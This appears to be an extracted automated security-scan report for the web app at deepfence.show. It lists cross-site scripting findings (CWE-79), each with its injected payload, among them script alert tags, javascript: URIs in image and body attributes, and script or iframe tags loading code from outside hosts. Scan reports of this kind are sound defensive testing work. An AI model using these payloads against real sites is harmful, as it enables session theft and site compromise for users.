\"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #154\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #155\nCross Site ScriptingScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=http://soapui.org/xss.js?<B>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #156\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=//ha.ckers.org/.j>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #157\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"javascript:alert('XSS')\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #158\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <iframe src=http://soapui.org/scriptlet.html <\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #159\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #160\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \\\";alert('XSS');//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #161\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #162\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #163Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY BACKGROUND=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #164\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY ONLOAD=alert('XSS')>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #165\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG DYNSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #166\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG LOWSRC=\"javascript:alert('XSS')\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #167\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BGSOUND SRC=\"javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 